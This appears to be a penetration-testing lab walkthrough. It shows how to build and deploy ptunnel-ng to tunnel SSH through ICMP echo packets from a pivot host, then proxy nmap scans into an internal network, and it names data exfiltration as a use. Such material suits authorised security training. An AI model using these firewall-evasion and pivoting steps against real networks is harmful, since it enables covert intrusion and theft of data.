ICMP tunneling encapsulates your traffic within ICMP packets containing echo requests and responses.
ICMP tunneling would only work when ping responses are permitted within a firewalled network. When a host within a firewalled network is allowed to ping an external server, it can encapsulate its traffic within the ping echo request and send it to an external server. The external server can validate this traffic and send an appropriate response, which is extremely useful for data exfiltration and creating pivot tunnels to an external server.
We will use the ptunnel-ng tool to create a tunnel between our Ubuntu server and our attack host. Once a tunnel is created, we will be able to proxy our traffic through the ptunnel-ng client. We can start the ptunnel-ng server on the target pivot host.
Setting Up & Using ptunnel-ng
git clone https://github.com/utoni/ptunnel-ng.gitBuilding Ptunnel-ng with Autogen.sh
sudo ./autogen.sh Alternative approach of building a static binary
sudo apt install automake autoconf -ycd ptunnel-ng/sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh./autogen.shTransferring Ptunnel-ng to the Pivot Host
scp -r ptunnel-ng ubuntu@10.129.202.64:~/Starting the ptunnel-ng Server on the Target Host
sudo ./ptunnel-ng -r10.129.202.64 -R22The IP address following -r should be the IP of the jump-box we want ptunnel-ng to accept connections on. In this case, whatever IP is reachable from our attack host would be what we would use
Back on the attack host, we can attempt to connect to the ptunnel-ng server (-p <ipAddressofTarget>) but ensure this happens through local port 2222 (-l2222). Connecting through local port 2222 allows us to send traffic through the ICMP tunnel.
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22With the ptunnel-ng ICMP tunnel successfully established, we can attempt to connect to the target using SSH through local port 2222
Tunneling an SSH connection through an ICMP Tunnel
ssh -p2222 -lubuntu 127.0.0.1Viewing Tunnel Traffic Statistics
On the client & server side of the connection, we will notice ptunnel-ng gives us session logs and traffic statistics associated with the traffic that passes through the ICMP tunnel. This is one way we can confirm that our traffic is passing from client to server utilizing ICMP.
Enabling Dynamic Port Forwarding over SSH
ssh -D 9050 -p2222 -lubuntu 127.0.0.1proxychains nmap -sV -sT 172.16.5.19 -p3389Proxychaining through the ICMP Tunnel
proxychains nmap -sV -sT 172.16.5.19 -p3389Note: Consider the versions of GLIBC, make sure you are on par with the one on the target.